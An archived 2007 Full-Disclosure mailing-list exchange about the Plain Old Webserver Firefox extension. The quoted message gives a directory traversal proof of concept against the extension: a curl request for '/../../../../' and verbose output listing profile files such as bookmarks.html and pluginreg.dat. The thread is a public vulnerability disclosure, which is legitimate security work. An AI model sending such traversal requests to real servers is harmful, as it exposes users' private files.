[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <6905b1570702091047p66b3035t9246d061cd4c242b@mail.gmail.com>
Date: Fri, 9 Feb 2007 18:47:57 +0000
From: "pdp (architect)" <pdp.gnucitizen@...glemail.com>
To: "Stefano Di Paola" <stefano.dipaola@...ec.it>
Cc: full-disclosure@...ts.grok.org.uk, WASC Forum <websecurity@...appsec.org>
Subject: Re: [WEB SECURITY] Plain Old Webserver - The
coolest firefox extension
hei man, this is not a news :)
On 2/9/07, Stefano Di Paola <stefano.dipaola@...ec.it> wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
> path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> <br><br><br><br>
> <a href='/../../../../firefox/'>firefox/</a><br>
> <a href='/../../../../bookmarks.html'>bookmarks.html</a><br>
> <a href='/../../../../appreg'>appreg</a><br>
> <a href='/../../../../default/'>default/</a><br>
> <a href='/../../../../pluginreg.dat'>pluginreg.dat</a><br>
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
>
> A new motto is on the way:
> HackTheHacker (ascii (tm))
>
> :)
>
> Cheers,
> Stefano
>
> Il giorno ven, 09/02/2007 alle 16.23 +0000, pdp (architect) ha scritto:
> > http://www.gnucitizen.org/blog/plain-old-webserver
> >
> > Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> >
> > https://addons.mozilla.org/firefox/3002/
> >
> --
> ...oOOo...oOOo....
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..................
>
>
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists